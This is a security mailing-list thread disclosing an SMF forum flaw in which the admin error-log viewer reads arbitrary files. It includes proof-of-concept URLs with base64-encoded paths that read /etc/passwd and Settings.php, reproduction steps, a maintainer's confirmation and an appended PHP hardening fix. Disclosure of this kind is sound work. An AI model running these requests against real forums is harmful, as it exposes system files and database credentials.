The flaw is not exploitable without privileges. On some occasions there are forums where there are co-administrators who have privileges to view the error log but not to modify code or at least read the MySQL connection.
It does not have a CVE-ID.

2013/1/8 Carlos Alberto Lopez Perez <[email protected]>

> On 07/01/13 15:54, WHK Yan wrote:
> > *Summary:*
> > --------------
> > A security flaw allows an attacker to know the full source file of the web
> > system.
> >
> > *Details:
> > -----------
> > Sources/ManageErrors.php Line 340:
> > // Make sure the file we are looking for is one they are allowed to look at
> > if (!is_readable($file) || (strpos($file, '../') !== false && (
> > strpos($file, $boarddir) === false || strpos($file, $sourcedir) === false)))
> > fatal_lang_error('error_bad_file', true,
> > array(htmlspecialchars($file)));
> >
> > Bypass of the strpos($file, '../') check: no need for "../", example:
> > /home/foo/www/Settings.php
> >
> > *PoC:
> > -------
> > http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q=
> > Read /etc/passwd
> >
> > Works with path disclosure to read Settings.php:
> > http://whk.drawcoders.net/index.php/topic,2792.0.html
> >
> > *Reproduce:
> > 1. Open http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
> > 2. Get the full path of the web app ( /home/1337/public_html/SSI.php ).
> > 3. Exploit in base64:
> > http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2hvbWUvc3BhZG1pbi9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHA=
> > To read /home/spadmin/public_html/Settings.php
> >
> > Referer and Mirror:
> > -------------------------
> > http://whk.drawcoders.net/index.php/topic,2805.0.html
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> Hi!
>
> I have verified SMF is affected by this issue.
>
> The PoC requires an admin login to be exploited. Is there any
> possibility to exploit this issue without an admin login?
>
> I guess a CVE should be assigned. Did you already ask for one?
>
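A hardened replacement for the check quoted in the report, added here as an illustration and not SMF's own code: it canonicalises the requested path with realpath() and requires it to lie under one of the allowed directories ($boarddir and $sourcedir are the globals named in the quoted snippet; the function name, the basename denylist and the call site are assumptions).

```php
<?php
// Added example, not SMF's own code. The quoted ManageErrors.php test
// short-circuits to "allowed" for any readable path that contains no '../',
// so an absolute path passes. Instead, resolve the path and check that the
// resolved form sits inside an allowed directory. $boarddir and $sourcedir
// are the SMF globals from the report; the rest of the names are assumed.
function isAllowedErrorLogFile($file, array $allowedDirs, array $denyBasenames)
{
    // realpath() resolves '..' segments and symlinks, and returns false for a
    // path that does not exist, so no substring search for '../' is needed.
    $real = realpath($file);
    if ($real === false || !is_file($real) || !is_readable($real)) {
        return false;
    }

    // Settings.php lives inside $boarddir, so a directory check alone would
    // still hand it over; refuse the sensitive basenames explicitly.
    if (in_array(basename($real), $denyBasenames, true)) {
        return false;
    }

    foreach ($allowedDirs as $dir) {
        $base = realpath($dir);
        if ($base === false) {
            continue;
        }
        // Compare against the canonical directory plus a trailing separator so
        // that /home/foo/www2 is not accepted as being inside /home/foo/www.
        $base = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
        if (strncmp($real, $base, strlen($base)) === 0) {
            return true;
        }
    }
    return false;
}

// Assumed call site mirroring the quoted code: $file has already been
// base64-decoded from the request, and the error path is unchanged.
$allowed = array($boarddir, $sourcedir);
$denied  = array('Settings.php');
if (!isAllowedErrorLogFile($file, $allowed, $denied)) {
    fatal_lang_error('error_bad_file', true, array(htmlspecialchars($file)));
}
```

Because the containment test runs on the resolved path, a symlink placed inside the board directory but pointing outside it is rejected as well.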
